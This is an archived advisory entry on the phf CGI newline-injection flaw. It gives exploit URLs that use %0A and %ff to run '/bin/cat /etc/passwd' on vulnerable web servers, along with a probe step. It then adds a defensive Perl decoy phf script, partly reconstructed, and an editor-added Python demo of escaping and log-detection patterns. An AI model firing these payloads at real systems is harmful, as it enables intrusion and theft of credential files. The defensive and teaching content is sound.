/cgi-bin/phf vulnerability

Description: A VERY well known character escaping vulnerability in some phf CGI scripts (CVE-1999-0067). phf runs the ph directory client through popen(), and its escape_shell_cmd() backslash-escapes a list of shell metacharacters but not the newline character, so a URL-encoded newline (%0A) in a query field ends the ph command line and whatever follows it is run by the shell as a second command.

Author: Unknown

Compromise: Whatever uid httpd is running as: generally 'nobody' or 'daemon', but sometimes root. (REMOTE)

Vulnerable Systems: Many old web server distributions (NCSA httpd and the early Apache releases derived from it) came with phf installed in cgi-bin.

Date: Unknown, but has probably been known since about Jan 1996

Notes: The injected command runs with the web server's privileges and its output is returned in the HTTP response, so a successful attempt hands back the file directly. Since some systems have a vulnerable bash you can also try http://host.com/cgi-bin/phf?Qalias=%ff/bin/cat%20/etc/passwd; this variant does not rely on the newline at all but on old bash releases treating the byte 0xFF as a command separator, so it only works where /bin/sh is such a bash. To check whether a host exposes phf at all, request /cgi-bin/phf with no query string: an installed phf answers with the "Form for CSO PH query" page. The fix is to remove phf from cgi-bin altogether; rebuilding it with an escape routine that also strips newlines closes the hole, but the program serves no purpose on a web server. Also see the addendum for a fake phf script to fool would-be crackers.

Exploit: It is something like http://host.com/cgi-bin/phf?Qalias=%0A/bin/cat%20/etc/passwd

Addendum(if any):

Greetings

Recently I have seen quite an upswing in attacks against web servers with people trying to exploit various CGI binaries including Phf. Phf has a known vulnerability that is being widely exploited in how it handles certain escaped arguments. To let me know of attacks on sites via this vulnerability I installed the following script on our web servers. I don't run phf on our systems so there is no problem of interrupting normal activity. The script simply looks like the original PHF program; however, it mails the security person whenever connections or probes are received.

The idea of luring attacks and presenting false information is an interesting one, as an attacker needs to find a vulnerability to exploit to get into the system. If vulnerabilities are presented that are not legitimate it is more difficult for an attacker to decide what is legitimate and what is just bait. If people wish to attack a system they take the risk that they are either falling into a trap or actually getting into the system. It's interesting to blur the two. Along with scripts like the one below people can play games with modified sendmail version lines or even present false login screens with the tcp wrapper twist.

In any case the script below was just thrown together as an example. On some sites I run one similar to it and it works very well as an early warning against attacks. Before running it I would certainly look it over to decide if it's safe for your system. If you see problems please let me know.

Paul Danckaert
pauld@lemur.org

----------------------------------------------------------------------
#!/usr/bin/perl
#
# Pseudo-Phf - A not-quite-real phf replacement that provides a warning
#              against attacks as well as presenting false
#              information to the attacker.
#
# Paul Danckaert (pauld@lemur.org)
#
# Note: the HTML markup and angle brackets of this script were stripped
# when the page was extracted; the heredocs below are reconstructed from
# the visible text, and the form field names other than Qalias are assumed.
#

$email    = "security\@lemur.org";     # '@' escaped so Perl does not interpolate @lemur
$sendmail = "/usr/lib/sendmail";

###

print "Content-type: text/html\n\n";

if ($ENV{"QUERY_STRING"} eq "") {
    ShowForm();
    $action = "Looked At Form";
} else {
    # A real phf query never contains a path; "/passwd" or "%2fpasswd"
    # in the query string means someone is trying the cat /etc/passwd trick.
    if ($ENV{"QUERY_STRING"} =~ /(\/|%2f)passwd/i) {
        ShowBadPass();
        $action = "Attempted Password Grab";
    } else {
        $action = "Submitted Form";
    }
}

$notice = "[/CGI-BIN/PHF] $action";

# Mail the full CGI environment (client address, user agent, query) to the
# security contact. Newlines are removed from each value so a crafted
# header cannot inject extra lines into the mail.
open(MAIL, "| $sendmail $email") || die "cannot run $sendmail: $!";
print MAIL "From: PHF Watcher <$email>\n";
print MAIL "To: $email\n";
print MAIL "Subject: $notice\n\n";
print MAIL "[AutoMessage from PHF]\n\n";
print MAIL "ENV List\n------------------------------------------\n";
foreach $var (keys %ENV) {
    $ENV{$var} =~ s/\n//g;
    print MAIL "$var \t $ENV{$var}\n";
}
print MAIL ".\n\n";
close(MAIL);

#
# Print Error Message to the users request.
#
print <<EOF;
<H1>Query Results</H1>
<P>
<PRE>
/usr/local/bin/ph - Command not found
</PRE>
EOF

exit 0;

sub ShowForm {
    print <<EOF;
<TITLE>Form for CSO PH query</TITLE>
<H1>Form for CSO PH query</H1>
This form will send a PH query to the specified ph server.
<P>
<FORM METHOD="GET" ACTION="/cgi-bin/phf">
PH Server: <INPUT NAME="Jserver" SIZE=30>
<P>
At least one of these fields must be specified:
<UL>
<LI>Alias <INPUT NAME="Qalias">
<LI>Name <INPUT NAME="Qname">
<LI>E-mail Address <INPUT NAME="Qemail">
<LI>Nickname <INPUT NAME="Qnickname">
<LI>Office Phone Number <INPUT NAME="Qoffice_phone">
<LI>HAM Callsign <INPUT NAME="Qcallsign">
<LI>Proxy <INPUT NAME="Qproxy">
<LI>High School <INPUT NAME="Qhigh_school">
<LI>SLIP Address <INPUT NAME="Qslip">
</UL>
<INPUT TYPE="checkbox" NAME="Jform"> Show additional fields to narrow query<BR>
<INPUT TYPE="checkbox" NAME="Jreturn"> Return more than default fields<BR>
<INPUT TYPE="submit" VALUE="Submit query">
</FORM>
<HR>
Questions comments to: Jim Browne
EOF
}

sub ShowBadPass {
    # The body of this routine was cut off on the page. Its stated purpose
    # is to show the attacker something that looks like a successful grab
    # but carries no real account data; two generic entries stand in for
    # whatever the original printed.
    print <<EOF;
<H1>Query Results</H1>
<P>
<PRE>
root:*:0:0:root:/:/bin/sh
nobody:*:65534:65534:nobody:/:/bin/false
</PRE>
EOF
}
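The two practical points on this page, why a URL-encoded newline slips past phf's metacharacter escaping and how to spot the probe in a web server log, as an added worked example. This is editor-added Python, not code from the page or from the phf author; the metacharacter list is modelled on phf's escape_shell_cmd() rather than copied from the NCSA source, the ph command line is an emulation of what phf hands to popen(), and the access-log lines are constructed for the example.

```python
"""Why phf's blacklist escaping fails on %0A, an allowlist that does not,
and a classifier for phf requests in a common-log-format access log."""
import re
from urllib.parse import unquote_to_bytes

# Shell metacharacters that phf's escape_shell_cmd() backslash-escaped before
# passing the query to popen(). Modelled on the well-known list (assumption,
# not the NCSA source); the point is what it lacks: newline (0x0A).
SHELL_META = frozenset(b"&;`'\"|*?~<>^()[]{}$\\")

def escape_blacklist(arg: bytes) -> bytes:
    """Vulnerable style: backslash each listed byte, pass everything else."""
    out = bytearray()
    for b in arg:
        if b in SHELL_META:
            out.append(0x5C)            # backslash
        out.append(b)
    return bytes(out)

ALLOWED = frozenset(
    b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.@ ")

def escape_allowlist(arg: bytes) -> bytes:
    """Hardened style: keep only bytes a ph alias field legitimately needs.
    A newline, a 0xFF byte or a slash never reaches the shell at all."""
    return bytes(b for b in arg if b in ALLOWED)

def build_ph_command(qalias_encoded: str, escape) -> bytes:
    """Emulate phf: URL-decode the Qalias value and splice it into the ph
    command line that is handed to /bin/sh via popen() (assumed shape)."""
    return b"/usr/local/bin/ph -m alias=" + escape(unquote_to_bytes(qalias_encoded))

def second_command(cmdline: bytes) -> bytes:
    """What /bin/sh would run as a separate command: the text after the first
    unescaped newline. Empty means no injection. The %ff variant is not
    modelled; it depended on an old bash bug, not on sh's newline handling."""
    idx = cmdline.find(b"\n")
    if idx == -1 or (idx > 0 and cmdline[idx - 1] == 0x5C):
        return b""
    return cmdline[idx + 1:].strip()

# Constructed access-log lines (not real traffic), common log format.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/1997:03:14:07 -0500] "GET /index.html HTTP/1.0" 200 1043',
    '10.0.0.9 - - [12/Mar/1997:03:15:22 -0500] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 612',
    '10.0.0.9 - - [12/Mar/1997:03:15:41 -0500] "GET /cgi-bin/phf?Qalias=%ff/bin/cat%20/etc/passwd HTTP/1.0" 200 612',
    '10.0.0.12 - - [12/Mar/1997:03:20:00 -0500] "GET /cgi-bin/phf HTTP/1.0" 404 0',
    '10.0.0.13 - - [12/Mar/1997:03:21:00 -0500] "GET /cgi-bin/phf?Qalias=jbrowne HTTP/1.0" 200 300',
]

# Request line for /cgi-bin/phf; group 1 is the query string, if any.
PHF_REQUEST = re.compile(r'"(?:GET|POST|HEAD) /cgi-bin/phf(?:\?(\S*))? ')
# Escapes that have no business in a ph query: newline, CR, 0xFF, a path.
INJECTION = re.compile(r'%0a|%0d|%ff|%2f|/', re.I)

def classify_phf_requests(lines):
    """Return (client, verdict) for every request touching /cgi-bin/phf:
    'exploit' when the query carries an injection escape, else 'probe'.
    A bare request for phf is still worth a look: it is how scanners
    test whether the program exists before firing the payload."""
    results = []
    for line in lines:
        m = PHF_REQUEST.search(line)
        if not m:
            continue
        query = m.group(1) or ""
        verdict = "exploit" if INJECTION.search(query) else "probe"
        results.append((line.split(" ", 1)[0], verdict))
    return results

if __name__ == "__main__":
    for enc in ("x%0a/bin/cat%20/etc/passwd", "x%3b/bin/cat%20/etc/passwd"):
        for esc in (escape_blacklist, escape_allowlist):
            cmd = build_ph_command(enc, esc)
            print(f"{esc.__name__:17} {cmd!r} -> injected: {second_command(cmd)!r}")
    for client, verdict in classify_phf_requests(SAMPLE_LOG):
        print(f"{client:10} {verdict}")
```

The semicolon case is included to show that the blacklist does its job for the characters it knows about (the `;` comes out as `\;`), which is exactly why the bypass uses a character it does not know about. The allowlist version needs no knowledge of the shell at all, which is the general lesson for anything that still builds command lines from user input.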